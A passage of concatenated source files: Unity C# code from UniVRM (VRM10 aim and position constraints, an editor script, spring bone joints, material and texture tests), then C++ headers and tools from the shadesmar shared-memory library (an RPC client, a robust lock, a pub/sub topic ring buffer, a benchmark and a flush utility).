get => m_freezeAxes;
set => m_freezeAxes = value;
}
[Header("Source")]
[SerializeField]
Transform m_source = default;
public override Transform Source
{
get => m_source;
set => m_source = value;
}
[Header("Destination")]
[SerializeField]
ObjectSpace m_destinationCoordinate = default;
/// <summary>
/// For serialization, this is recorded as Aim and Up vectors.
/// The UniVRM Editor does not allow Aim and Up to be non-orthogonal.
/// </summary>
[SerializeField]
public Quaternion DestinationOffset = Quaternion.identity;
Quaternion m_delta;
public Quaternion Delta => m_delta;
public Vector3 UpVector
{
get
{
switch (m_destinationCoordinate)
{
case ObjectSpace.model: return ModelRoot.up;
case ObjectSpace.local:
{
if (m_src == null)
{
return transform.up;
}
return (TR.FromParent(transform).Rotation * m_dst.LocalInitial.Rotation) * Vector3.up;
}
default:
throw new NotImplementedException();
}
}
}
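// Builds an aim rotation whose forward axis points from this transform toward
// Source and whose up axis follows UpVector, extracts the yaw/pitch delta
// relative to the initial local rotation (plus DestinationOffset), zeroes any
// axis listed in FreezeAxes, and applies the result.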
public override void OnProcess()
{
var zAxis = (Source.position - transform.position).normalized;
var xAxis = Vector3.Cross(UpVector, zAxis);
var yAxis = Vector3.Cross(zAxis, xAxis);
var m = new Matrix4x4(xAxis, yAxis, zAxis, new Vector4(0, 0, 0, 1));
var parent = TR.FromParent(transform);
m_delta = Quaternion.Inverse(parent.Rotation * m_src.LocalInitial.Rotation * DestinationOffset) * m.rotation;
var (yaw, pitch) = Matrix4x4.Rotate(Quaternion.Inverse(m_delta)).CalcYawPitch(Vector3.forward);
if (m_freezeAxes.HasFlag(YawPitchMask.Yaw)) yaw = 0;
if (m_freezeAxes.HasFlag(YawPitchMask.Pitch)) pitch = 0;
m_delta = Quaternion.Euler(pitch, yaw, 0);
transform.rotation = parent.Rotation * m_src.LocalInitial.Rotation * Delta;
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/Constraint/VRM10PositionConstraint.cs<|end_filename|>
using System;
using UniGLTF.Extensions.VRMC_node_constraint;
using UnityEngine;
namespace UniVRM10
{
/// <summary>
/// Adds the difference (delta) between the source's initial and current position, multiplied by Weight, to this object's initial position.
/// </summary>
[DisallowMultipleComponent]
public class VRM10PositionConstraint : VRM10RotationPositionConstraintBase
{
public override Vector3 Delta => FreezeAxes.Freeze(m_delta.Translation) * Weight;
public override TR GetSourceCurrent()
{
var coords = GetSourceCoords();
if (m_src == null)
{
return coords;
}
return coords * new TR(Delta);
}
public override TR GetDstCurrent()
{
var coords = GetDstCoords();
if (m_src == null)
{
return coords;
}
return coords * new TR(Delta);
}
protected override void ApplyDelta()
{
switch (DestinationCoordinate)
{
case ObjectSpace.local:
m_dst.ApplyLocal(DestinationInitialCoords(ObjectSpace.local) * new TR(DestinationOffset) * new TR(Delta));
break;
case ObjectSpace.model:
m_dst.ApplyModel(DestinationInitialCoords(ObjectSpace.model) * new TR(DestinationOffset) * new TR(Delta));
break;
default:
throw new NotImplementedException();
}
}
}
}
<|start_filename|>Assets/VRM10/Editor/Components/Constraint/VRM10AimConstraintEditor.cs<|end_filename|>
using System.Text;
using UnityEditor;
using UnityEngine;
namespace UniVRM10
{
[CustomEditor(typeof(VRM10AimConstraint))]
public class VRM10AimConstraintEditor : Editor
{
VRM10AimConstraint m_target;
void OnEnable()
{
m_target = (VRM10AimConstraint)target;
}
static GUIStyle s_style;
static GUIStyle Style
{
get
{
if (s_style == null)
{
s_style = new GUIStyle("box");
}
return s_style;
}
}
static void DrawAimUp(Quaternion rot, Vector3 pos, Color c)
{
Handles.matrix = Matrix4x4.identity;
Handles.color = c;
// aim
var aim = pos + rot * Vector3.forward * 0.3f;
Handles.DrawLine(pos, aim);
Handles.Label(aim, "aim");
// up
var up = pos + rot * Vector3.up * 0.3f;
Handles.DrawLine(pos, up);
Handles.Label(up, "up");
}
public void OnSceneGUI()
{
if (m_target.Source == null)
{
return;
}
// this to target line
Handles.color = Color.yellow;
Handles.DrawLine(m_target.Source.position, m_target.transform.position);
var pos = m_target.transform.position;
var pr = TR.FromParent(m_target.transform);
if (m_target.m_src == null)
{
EditorGUI.BeginChangeCheck();
TR.FromWorld(m_target.transform).Draw(0.2f);
Handles.matrix = Matrix4x4.identity;
var rot = Handles.RotationHandle(pr.Rotation * m_target.DestinationOffset, pos);
if (EditorGUI.EndChangeCheck())
{
Undo.RecordObject(m_target, "Rotated RotateAt Point");
m_target.DestinationOffset = Quaternion.Inverse(pr.Rotation) * rot;
}
DrawAimUp(rot, pos, Color.yellow);
}
else
{
var init = pr.Rotation * m_target.m_src.LocalInitial.Rotation;
DrawAimUp(init * m_target.DestinationOffset, m_target.transform.position, Color.yellow);
new TR(init, m_target.transform.position).Draw(0.2f);
DrawAimUp(init * m_target.DestinationOffset * m_target.Delta, m_target.transform.position, Color.magenta);
}
// Target UPVector
Handles.color = Color.green;
Handles.DrawLine(m_target.transform.position, m_target.transform.position + m_target.UpVector);
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/Constraint/ConstraintSource.cs<|end_filename|>
using UnityEngine;
using System;
using UniGLTF.Extensions.VRMC_node_constraint;
namespace UniVRM10
{
public class ConstraintSource
{
public readonly Transform ModelRoot;
readonly Transform Source;
public readonly TR ModelInitial;
public readonly TR LocalInitial;
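// Delta: the source transform's movement since initialization, measured
// relative to its initial pose composed with sourceRotationOffset, expressed
// in either local or model space.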
public TR Delta(ObjectSpace coords, Quaternion sourceRotationOffset)
{
switch (coords)
{
// case SourceCoordinates.World: return m_transform.rotation * Quaternion.Inverse(m_initial.Rotation);
case ObjectSpace.local: return TR.FromLocal(Source) * (LocalInitial * new TR(sourceRotationOffset)).Inverse();
case ObjectSpace.model: return TR.FromWorld(Source) * (TR.FromParent(ModelRoot) * ModelInitial * new TR(sourceRotationOffset)).Inverse();
default: throw new NotImplementedException();
}
}
public ConstraintSource(Transform t, Transform modelRoot = null)
{
{
Source = t;
LocalInitial = TR.FromLocal(t);
}
if (modelRoot != null)
{
ModelRoot = modelRoot;
ModelInitial = TR.FromLocal(t);
}
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/SpringBone/VRM10SpringBoneJoint.cs<|end_filename|>
using System;
using System.Collections.Generic;
using UnityEngine;
#if UNITY_EDITOR
using UnityEditor;
#endif
namespace UniVRM10
{
[Serializable]
public class VRM10SpringBoneJoint : MonoBehaviour
{
[SerializeField, Range(0, 4), Header("Settings")]
public float m_stiffnessForce = 1.0f;
[SerializeField, Range(0, 2)]
public float m_gravityPower = 0;
[SerializeField]
public Vector3 m_gravityDir = new Vector3(0, -1.0f, 0);
[SerializeField, Range(0, 1)]
public float m_dragForce = 0.4f;
[SerializeField]
public bool m_exclude;
[SerializeField, Range(0, 0.5f), Header("Collision")]
public float m_jointRadius = 0.02f;
public void DrawGizmo(Transform center, Color color)
{
#if UNITY_EDITOR
// Gizmos.matrix = Transform.localToWorldMatrix;
Gizmos.color = color;
Gizmos.DrawSphere(transform.position, m_jointRadius);
#endif
}
}
}
<|start_filename|>Assets/VRM10/Tests/MaterialImportTests.cs<|end_filename|>
using System.IO;
using System.Linq;
using NUnit.Framework;
using UniGLTF;
using UnityEngine;
using VRMShaders;
namespace UniVRM10
{
public class MaterialImporterTests
{
static string AliciaPath
{
get
{
return Path.GetFullPath(Application.dataPath + "/../Tests/Models/Alicia_vrm-0.51/AliciaSolid_vrm-0.51.vrm")
.Replace("\\", "/");
}
}
[Test]
public void MaterialImporterTest()
{
var migratedBytes = MigrationVrm.Migrate(File.ReadAllBytes(AliciaPath));
var data = new GlbLowLevelParser(AliciaPath, migratedBytes).Parse();
var matDesc = new Vrm10MaterialDescriptorGenerator().Get(data, 0);
Assert.AreEqual("Alicia_body", matDesc.Name);
Assert.AreEqual("VRM10/MToon10", matDesc.ShaderName);
Assert.AreEqual("Alicia_body", matDesc.TextureSlots["_MainTex"].UnityObjectName);
Assert.AreEqual("Alicia_body", matDesc.TextureSlots["_ShadeTex"].UnityObjectName);
AreColorEqualApproximately(new Color(1, 1, 1, 1), matDesc.Colors["_Color"]);
ColorUtility.TryParseHtmlString("#FFDDD6", out var shadeColor);
AreColorEqualApproximately(shadeColor, matDesc.Colors["_ShadeColor"]);
Assert.AreEqual(1.0f - 0.1f, matDesc.FloatValues["_GiEqualization"]);
var (key, value) = matDesc.EnumerateSubAssetKeyValue().First();
Assert.AreEqual(new SubAssetKey(typeof(Texture2D), "Alicia_body"), key);
}
private void AreColorEqualApproximately(Color expected, Color actual)
{
Assert.AreEqual(Mathf.RoundToInt(expected.r * 255), Mathf.RoundToInt(actual.r * 255));
Assert.AreEqual(Mathf.RoundToInt(expected.g * 255), Mathf.RoundToInt(actual.g * 255));
Assert.AreEqual(Mathf.RoundToInt(expected.b * 255), Mathf.RoundToInt(actual.b * 255));
Assert.AreEqual(Mathf.RoundToInt(expected.a * 255), Mathf.RoundToInt(actual.a * 255));
}
}
}
<|start_filename|>Assets/UniGLTF/Tests/UniGLTF/TextureTests.cs<|end_filename|>
using System;
using System.IO;
using System.Linq;
using NUnit.Framework;
using UnityEngine;
using VRMShaders;
namespace UniGLTF
{
public class TextureTests
{
[Test]
public void TextureExportTest()
{
// Dummy texture
var tex0 = new Texture2D(128, 128)
{
wrapMode = TextureWrapMode.Clamp,
filterMode = FilterMode.Trilinear,
};
var textureExporter = new TextureExporter(new EditorTextureSerializer());
var material = new Material(Shader.Find("Standard"));
material.mainTexture = tex0;
var materialExporter = new MaterialExporter();
materialExporter.ExportMaterial(material, textureExporter, new GltfExportSettings());
var exported = textureExporter.Export();
var (convTex0, colorSpace) = exported[0];
var sampler = TextureSamplerUtil.Export(convTex0);
Assert.AreEqual(glWrap.CLAMP_TO_EDGE, sampler.wrapS);
Assert.AreEqual(glWrap.CLAMP_TO_EDGE, sampler.wrapT);
Assert.AreEqual(FilterMode.Trilinear, convTex0.filterMode);
Assert.IsTrue(convTex0.mipmapCount > 1);
// Trilinear => LINEAR_MIPMAP_LINEAR
Assert.AreEqual(glFilter.LINEAR_MIPMAP_LINEAR, sampler.minFilter);
Assert.AreEqual(glFilter.LINEAR, sampler.magFilter);
}
static FileInfo Find(DirectoryInfo current, string target)
{
foreach (var child in current.EnumerateFiles())
{
if (child.Name == target)
{
return child;
}
}
foreach (var child in current.EnumerateDirectories())
{
var found = Find(child, target);
if (found != null)
{
return found;
}
}
return null;
}
static FileInfo GetGltfTestModelPath(string name)
{
var env = System.Environment.GetEnvironmentVariable("GLTF_SAMPLE_MODELS");
if (string.IsNullOrEmpty(env))
{
return null;
}
var root = new DirectoryInfo($"{env}/2.0");
if (!root.Exists)
{
return null;
}
return Find(root, name);
}
[Test]
public void TextureExtractTest()
{
var path = GetGltfTestModelPath("BoomBox.glb");
if (path == null)
{
return;
}
// parse
var data = new GlbFileParser(path.FullName).Parse();
// load
using (var context = new ImporterContext(data))
{
var instance = context.Load();
var textureMap = instance.RuntimeResources
.Select(kv => (kv.Item1, kv.Item2 as Texture))
.Where(kv => kv.Item2 != null)
.ToDictionary(kv => kv.Item1, kv => kv.Item2)
;
// extractor
var extractor = new TextureExtractor(data, UnityPath.FromUnityPath(""), textureMap);
var m = context.TextureDescriptorGenerator.Get().GetEnumerable()
.FirstOrDefault(x => x.SubAssetKey.Name == "texture_1.standard");
Assert.Catch<NotImplementedException>(() => extractor.Extract(m.SubAssetKey, m));
}
}
}
}
| gonnavis/UniVRM |
<|start_filename|>include/shadesmar/rpc/client.h<|end_filename|>
/* MIT License
Copyright (c) 2021 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_RPC_CLIENT_H_
#define INCLUDE_SHADESMAR_RPC_CLIENT_H_
#include <memory>
#include <string>
#include <utility>
#include "shadesmar/memory/copier.h"
#include "shadesmar/memory/memory.h"
#include "shadesmar/rpc/channel.h"
namespace shm::rpc {
class Client {
public:
explicit Client(const std::string &channel_name);
Client(const std::string &channel_name,
std::shared_ptr<memory::Copier> copier);
Client(const Client &) = delete;
Client(Client &&);
bool call(const memory::Memblock &req, memory::Memblock *resp) const;
bool send(const memory::Memblock &req, uint32_t *pos) const;
bool recv(uint32_t pos, memory::Memblock *resp) const;
void free_resp(memory::Memblock *resp) const;
private:
std::string channel_name_;
std::unique_ptr<Channel> channel_;
};
Client::Client(const std::string &channel_name) : channel_name_(channel_name) {
channel_ = std::make_unique<Channel>(channel_name);
}
Client::Client(const std::string &channel_name,
std::shared_ptr<memory::Copier> copier)
: channel_name_(channel_name) {
channel_ = std::make_unique<Channel>(channel_name, copier);
}
Client::Client(Client &&other) {
channel_name_ = other.channel_name_;
channel_ = std::move(other.channel_);
}
bool Client::call(const memory::Memblock &req, memory::Memblock *resp) const {
uint32_t pos;
bool success = send(req, &pos);
if (!success) return success;
return recv(pos, resp);
}
bool Client::send(const memory::Memblock &req, uint32_t *pos) const {
return channel_->write_client(req, pos);
}
bool Client::recv(uint32_t pos, memory::Memblock *resp) const {
return channel_->read_client(pos, resp);
}
void Client::free_resp(memory::Memblock *resp) const {
channel_->copier()->dealloc(resp->ptr);
resp->ptr = nullptr;
resp->size = 0;
}
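// Usage sketch (illustrative only; the channel name and payload below are
// hypothetical, not part of this header):
//
//   shm::rpc::Client client("example_channel");
//   shm::memory::Memblock req(payload_ptr, payload_size), resp;
//   if (client.call(req, &resp)) {
//     // ... consume resp.ptr / resp.size ...
//     client.free_resp(&resp);
//   }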
} // namespace shm::rpc
#endif // INCLUDE_SHADESMAR_RPC_CLIENT_H_
<|start_filename|>include/shadesmar/concurrency/robust_lock.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_CONCURRENCY_ROBUST_LOCK_H_
#define INCLUDE_SHADESMAR_CONCURRENCY_ROBUST_LOCK_H_
#include <unistd.h>
#include <cerrno>
#include <iostream>
#include <string>
#include <thread>
#include "shadesmar/concurrency/lock.h"
#include "shadesmar/concurrency/lockless_set.h"
#include "shadesmar/concurrency/rw_lock.h"
#include "shadesmar/macros.h"
namespace shm::concurrent {
class RobustLock {
public:
RobustLock();
RobustLock(const RobustLock &);
~RobustLock();
void lock();
bool try_lock();
void unlock();
void lock_sharable();
bool try_lock_sharable();
void unlock_sharable();
void reset();
private:
void prune_readers();
PthreadReadWriteLock mutex_;
std::atomic<__pid_t> exclusive_owner{0};
LocklessSet<8> shared_owners;
};
RobustLock::RobustLock() = default;
RobustLock::RobustLock(const RobustLock &lock) {
mutex_ = lock.mutex_;
exclusive_owner.store(lock.exclusive_owner.load());
shared_owners = lock.shared_owners;
}
RobustLock::~RobustLock() { exclusive_owner = 0; }
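// RobustLock wraps PthreadReadWriteLock and records the owning PIDs so that a
// lock held by a crashed process can be detected (via proc_dead) and released,
// instead of deadlocking the surviving processes.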
void RobustLock::lock() {
while (!mutex_.try_lock()) {
if (exclusive_owner.load() != 0) {
auto ex_proc = exclusive_owner.load();
if (proc_dead(ex_proc)) {
if (exclusive_owner.compare_exchange_strong(ex_proc, 0)) {
mutex_.unlock();
continue;
}
}
} else {
prune_readers();
}
std::this_thread::sleep_for(std::chrono::microseconds(1));
}
exclusive_owner = getpid();
}
bool RobustLock::try_lock() {
if (!mutex_.try_lock()) {
if (exclusive_owner != 0) {
auto ex_proc = exclusive_owner.load();
if (proc_dead(ex_proc)) {
if (exclusive_owner.compare_exchange_strong(ex_proc, 0)) {
mutex_.unlock();
}
}
} else {
prune_readers();
}
if (mutex_.try_lock()) {
exclusive_owner = getpid();
return true;
} else {
return false;
}
} else {
exclusive_owner = getpid();
return true;
}
}
void RobustLock::unlock() {
__pid_t current_pid = getpid();
if (exclusive_owner.compare_exchange_strong(current_pid, 0)) {
mutex_.unlock();
}
}
void RobustLock::lock_sharable() {
while (!mutex_.try_lock_sharable()) {
if (exclusive_owner != 0) {
auto ex_proc = exclusive_owner.load();
if (proc_dead(ex_proc)) {
if (exclusive_owner.compare_exchange_strong(ex_proc, 0)) {
exclusive_owner = 0;
mutex_.unlock();
}
}
}
std::this_thread::sleep_for(std::chrono::microseconds(1));
}
while (!shared_owners.insert(getpid())) {
}
}
bool RobustLock::try_lock_sharable() {
if (!mutex_.try_lock_sharable()) {
if (exclusive_owner != 0) {
auto ex_proc = exclusive_owner.load();
if (proc_dead(ex_proc)) {
if (exclusive_owner.compare_exchange_strong(ex_proc, 0)) {
exclusive_owner = 0;
mutex_.unlock();
}
}
}
if (mutex_.try_lock_sharable()) {
while (!shared_owners.insert(getpid())) {
}
return true;
} else {
return false;
}
} else {
while (!shared_owners.insert(getpid())) {
}
return true;
}
}
void RobustLock::unlock_sharable() {
if (shared_owners.remove(getpid())) {
mutex_.unlock_sharable();
}
}
void RobustLock::reset() { mutex_.reset(); }
void RobustLock::prune_readers() {
for (auto &i : shared_owners.array_) {
uint32_t shared_owner = i.load();
if (shared_owner == 0) continue;
if (proc_dead(shared_owner)) {
if (shared_owners.remove(shared_owner)) {
mutex_.unlock_sharable();
}
}
}
}
} // namespace shm::concurrent
#endif // INCLUDE_SHADESMAR_CONCURRENCY_ROBUST_LOCK_H_
<|start_filename|>benchmark/pubsub.cpp<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#include <cassert>
#include <chrono>
#include <iostream>
#ifdef SINGLE_HEADER
#include "shadesmar.h"
#else
#include "shadesmar/memory/copier.h"
#include "shadesmar/memory/dragons.h"
#include "shadesmar/pubsub/publisher.h"
#include "shadesmar/pubsub/subscriber.h"
#include "shadesmar/stats.h"
#endif
const char topic[] = "raw_benchmark_topic";
shm::stats::Welford per_second_lag;
struct Message {
uint64_t count;
uint64_t timestamp;
uint8_t *data;
};
uint64_t current_count = 0;
void callback(shm::memory::Memblock *memblock) {
if (memblock->is_empty()) {
return;
}
auto *msg = reinterpret_cast<Message *>(memblock->ptr);
auto lag = shm::current_time() - msg->timestamp;
// assert(current_count == msg->count - 1);
assert(current_count < msg->count);
current_count = msg->count;
per_second_lag.add(lag);
}
void subscribe_loop(int seconds) {
shm::pubsub::Subscriber sub(topic, callback);
for (int sec = 0; sec < seconds; ++sec) {
auto start = std::chrono::steady_clock::now();
for (auto now = start; now < start + std::chrono::seconds(1);
now = std::chrono::steady_clock::now()) {
sub.spin_once();
}
std::cout << per_second_lag << std::endl;
per_second_lag.clear();
}
}
void publish_loop(int seconds, int vector_size) {
std::cout << "Number of bytes = " << vector_size << std::endl;
std::cout << "Time unit = " << TIMESCALE_NAME << std::endl;
auto *rawptr = malloc(vector_size);
std::memset(rawptr, 255, vector_size);
Message *msg = reinterpret_cast<Message *>(rawptr);
msg->count = 0;
shm::pubsub::Publisher pub(topic);
auto start = std::chrono::steady_clock::now();
for (auto now = start; now < start + std::chrono::seconds(seconds);
now = std::chrono::steady_clock::now()) {
msg->count++;
msg->timestamp = shm::current_time();
pub.publish(msg, vector_size);
}
free(msg);
}
int main() {
const int SECONDS = 10;
const int VECTOR_SIZE = 32 * 1024;
std::thread subscribe_thread(subscribe_loop, SECONDS);
std::thread publish_thread(publish_loop, SECONDS, VECTOR_SIZE);
subscribe_thread.join();
publish_thread.join();
}
<|start_filename|>src/flush_tmp.cpp<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#include <sys/mman.h>
#include <iostream>
#include "shadesmar/memory/tmp.h"
void flush(std::string const &topic) {
std::cout << "Flushing " << topic << std::endl;
shm_unlink(topic.c_str());
}
int main(int argc, char **argv) {
if (argc == 1) {
for (auto &topic : shm::memory::tmp::get_tmp_names()) {
flush(topic);
}
shm::memory::tmp::delete_topics();
} else {
flush(std::string(argv[1]));
}
}
<|start_filename|>include/shadesmar/pubsub/topic.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_PUBSUB_TOPIC_H_
#define INCLUDE_SHADESMAR_PUBSUB_TOPIC_H_
#include <atomic>
#include <cstring>
#include <iostream>
#include <memory>
#include <string>
#include "shadesmar/concurrency/scope.h"
#include "shadesmar/macros.h"
#include "shadesmar/memory/allocator.h"
#include "shadesmar/memory/copier.h"
#include "shadesmar/memory/memory.h"
namespace shm::pubsub {
// The logic for optimistically jumping ahead, if the current read
// logic has fallen behind (circular wrap around). `counter` is the
// current write head location.
inline uint32_t jumpahead(uint32_t counter, uint32_t queue_size) {
return counter - queue_size / 2;
}
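// Worked example (hypothetical values): with queue_size = 64 and the write
// head at counter = 100, a lagging reader jumps to 100 - 64 / 2 = 68, the
// midpoint of the most recent queue_size entries (36..100).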
template <class LockT>
struct TopicElemT {
memory::Element msg;
LockT mutex;
TopicElemT() : msg(), mutex() {}
TopicElemT(const TopicElemT &topic_elem) {
msg = topic_elem.msg;
mutex = topic_elem.mutex;
}
void reset() {
msg.reset();
mutex.reset();
}
};
using LockType = concurrent::PthreadReadWriteLock;
class Topic {
using TopicElem = TopicElemT<LockType>;
template <concurrent::ExlOrShr type>
using Scope = concurrent::ScopeGuard<LockType, type>;
public:
explicit Topic(const std::string &topic)
: Topic(topic, std::make_shared<memory::DefaultCopier>()) {}
Topic(const std::string &topic, std::shared_ptr<memory::Copier> copier)
: memory_(topic) {
if (copier == nullptr) {
copier = std::make_shared<memory::DefaultCopier>();
}
copier_ = copier;
}
~Topic() = default;
bool write(memory::Memblock memblock) {
/*
* Writes always happen at the head of the circular queue, the
* head is atomically incremented to prevent any race across
* processes. The head of the queue is stored as a counter
* on shared memory.
*/
if (memblock.size > memory_.allocator_->get_free_memory()) {
std::cerr << "Increase buffer_size" << std::endl;
return false;
}
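// queue_size() is assumed to be a power of two, so masking with
// (queue_size() - 1) is equivalent to counter() % queue_size().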
uint32_t q_pos = counter() & (queue_size() - 1);
TopicElem *elem = &(memory_.shared_queue_->elements[q_pos]);
/*
* Code path:
* 1. Allocate shared memory buffer `new_address`
* 2. Copy msg data to `new_address`
* 3. Acquire exclusive lock
* 4. Complex "swap" of old and new fields
* 5. Release exclusive lock
* 6. If old buffer is empty, deallocate it
*/
uint8_t *new_address = memory_.allocator_->alloc(memblock.size);
if (new_address == nullptr) {
return false;
}
copier_->user_to_shm(new_address, memblock.ptr, memblock.size);
uint8_t *old_address = nullptr;
{
/*
* This locked block should *only* contain accesses
* to `elem`, any other expensive compute that doesn't
* include `elem` can be put outside this block.
*/
Scope<concurrent::EXCLUSIVE> _(&elem->mutex);
if (!elem->msg.empty) {
old_address =
memory_.allocator_->handle_to_ptr(elem->msg.address_handle);
}
elem->msg.address_handle =
memory_.allocator_->ptr_to_handle(new_address);
elem->msg.size = memblock.size;
elem->msg.empty = false;
}
while (!memory_.allocator_->free(old_address)) {
std::this_thread::sleep_for(std::chrono::microseconds(100));
}
inc_counter();
return true;
}
/*
* Reads aren't like writes in one major way: writes don't require
* any information about which position in the queue to write to. It
* defaults to the head of the queue. Reads requires an explicit
* position in the queue to read(`pos`). We use this position
* argument since we need to support multiple subscribers each
* reading at their own pace. Between picking the element at pos to
* read from and acquiring a read lock, the publisher may write a new
* value at pos. In this case, we implement a slow path to jump ahead.
*/
bool read(memory::Memblock *memblock, std::atomic<uint32_t> *pos) {
TopicElem *elem =
&(memory_.shared_queue_->elements[*pos & (queue_size() - 1)]);
/*
* Code path (without the slow path for lag):
* 1. Acquire sharable lock
* 2. Check for emptiness
* 3. Copy from shared memory to input param `msg`
* 4. Release sharable lock
*/
Scope<concurrent::SHARED> _(&elem->mutex);
// Using a lambda for this reduced throughput.
#define MOVE_ELEM(_elem) \
if (_elem->msg.empty) { \
return false; \
} \
auto *dst = memory_.allocator_->handle_to_ptr(_elem->msg.address_handle); \
memblock->size = _elem->msg.size; \
memblock->ptr = copier_->alloc(memblock->size); \
copier_->shm_to_user(memblock->ptr, dst, memblock->size);
if (queue_size() > counter() - *pos) {
// Fast path.
MOVE_ELEM(elem);
return true;
}
// See comment in `pubsub/subscriber.h`, in function `get_message()` for
// more info. *pos is outdated, the publisher has already written here
// before the reader lock was held. Jump ahead optimisically.
//
// Q: Why no lock on `next_best_elem`?
// A: `elem` is behind `next_best_elem`. With a lock on the former, the
// publisher cannot cross `elem` to get to `next_best_elem`.
//
// Q: Why is the jump ahead implemented again in `get_message()`?
// A: `get_message()` can jump ahead outside of holding a lock. If a
// lag can be detected there, it is more performant. This is a slow
// path under a read lock.
*pos = jumpahead(counter(), queue_size());
TopicElem *next_best_elem =
&(memory_.shared_queue_->elements[*pos & (queue_size() - 1)]);
MOVE_ELEM(next_best_elem);
return true;
#undef MOVE_ELEM
}
inline __attribute__((always_inline)) void inc_counter() {
memory_.shared_queue_->counter++;
}
inline __attribute__((always_inline)) uint32_t counter() const {
return memory_.shared_queue_->counter.load();
}
size_t queue_size() const { return memory_.queue_size(); }
inline std::shared_ptr<memory::Copier> copier() const { return copier_; }
private:
memory::Memory<TopicElem, memory::Allocator> memory_;
std::shared_ptr<memory::Copier> copier_;
};
} // namespace shm::pubsub
#endif // INCLUDE_SHADESMAR_PUBSUB_TOPIC_H_
<|start_filename|>include/shadesmar/pubsub/publisher.h<|end_filename|>
